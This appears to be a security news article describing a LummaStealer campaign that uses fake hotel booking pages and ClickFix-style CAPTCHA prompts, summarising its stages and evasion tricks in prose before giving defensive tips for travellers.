The Rise of Travel-Related Cyber Scams

With global travel on the rise, cyber criminals are taking advantage of eager travelers through fake booking sites, phishing scams, and fraudulent listings. The latest threat? A sophisticated campaign utilizing booking websites to spread LummaStealer malware, using deceptive CAPTCHA prompts to trick unsuspecting individuals.

A New Twist in the LummaStealer Playbook

In early 2025, cybersecurity analysts at G DATA uncovered a new campaign delivering LummaStealer through booking confirmation pages. Initially spotted on a travel itinerary for Palawan, Philippines, the attack quickly shifted to a hotel in Munich, Germany. This pattern indicates a widening global reach for LummaStealer, which has now adopted malvertising techniques to target victims through travel-related sites.

LummaStealer, first discovered in 2022, operates under a Malware-as-a-Service (MaaS) model. Previously, it spread via platforms like GitHub and Telegram, but now, it has infiltrated booking websites, exposing a vast audience to potential infection.

How the Attack Works

Stage 1: Fake Booking Confirmation& CAPTCHA Trick

Victims receive a booking confirmation link, often through phishing emails, leading to a fake travel website (e.g., hxxps://payment-confirmation.82736[.]store/pgg46). This page mimics legitimate booking sites, complete with a CAPTCHA verification step.

Unlike a standard CAPTCHA, this one instructs users to copy and paste a command into their Windows Run box. This technique, called ClickFix, is an emerging social engineering trick designed to convince users to execute malicious commands themselves.

Stage 2: Hidden PHP & PowerShell Execution

Upon investigating the page source, researchers found an obfuscated JavaScript script loading a command from an external PHP script. This script uses ROT13 encryption to conceal aBase64-encoded PowerShell command, which gets copied into the victim's clipboard.

Stage 3: Payload Deployment

When pasted into the Windows Run command, the PowerShell script fetches a second-stage payload from a remote server. This file is stored in the Temp directory and executed via the Start-Process command, ultimately downloading and installing LummaStealer.

Stage 4: Evasion Techniques

LummaStealer’s latest variants have significantly increased in size (from 2MB to 9MB), a 350% growth. This expansion is likely due to binary padding a tactic used to evade antivirus detection by adding junk data to inflate file size, making signature-based detection slower and less effective.

Additionally, LummaStealer employs Indirect Control Flow obfuscation, dynamically calculating execution paths at runtime to make analysis harder. This mirrors techniques used by advanced malware families like Emotet, suggesting that LummaStealer’s operators are refining their tradecraft.

What was Found in the Wild

·       Fake Travel Sites &PayPal Credential Theft

Further analysis of the campaign’s infrastructure revealed that the same server hosting the fake booking sitesalso housed phishing domains designed to steal PayPal credentials. This suggests that cybercriminals are running multiple scams simultaneously, preying on users who book trips and make online payments.

·       Expanding Network of Fake Domains

Using telemetry data from VirusTotal, researchers identified multiple subdomains exhibiting the same behavior as the original attack. These domains used identical ClickFix tactics, reinforcing the idea that this is a coordinated campaign designed to ensnare as many victims as possible.

Looking Ahead: The Growing Threat of LummaStealer

LummaStealer’s aggressive expansion and adoption of new social engineering tactics indicate that it’s not slowing down. With a playbook reminiscent of the infamous Emotet banking trojan, it’s becoming a persistent and evolving threat.

Protecting Yourself from Travel-Related Cyber Threats

1. Verify Booking Sites – Always book directly through trusted sources and be cautious of     unsolicited emails offering travel deals.
2. Check URLs Carefully – Phishing sites often use URLs that look like legitimate ones. Watch for     subtle misspellings or unusual domain names.
3. Never Paste Commands from Unknown Sources – Legitimate services will never ask you to copy and run commands manually.
4. Use  Security Software – A reputable antivirus and anti-malware solution can help detect and     block malicious scripts.
5. Enable  Multi-Factor Authentication (MFA) – Adding an extra layer of security to accounts reduces the impact of credential theft.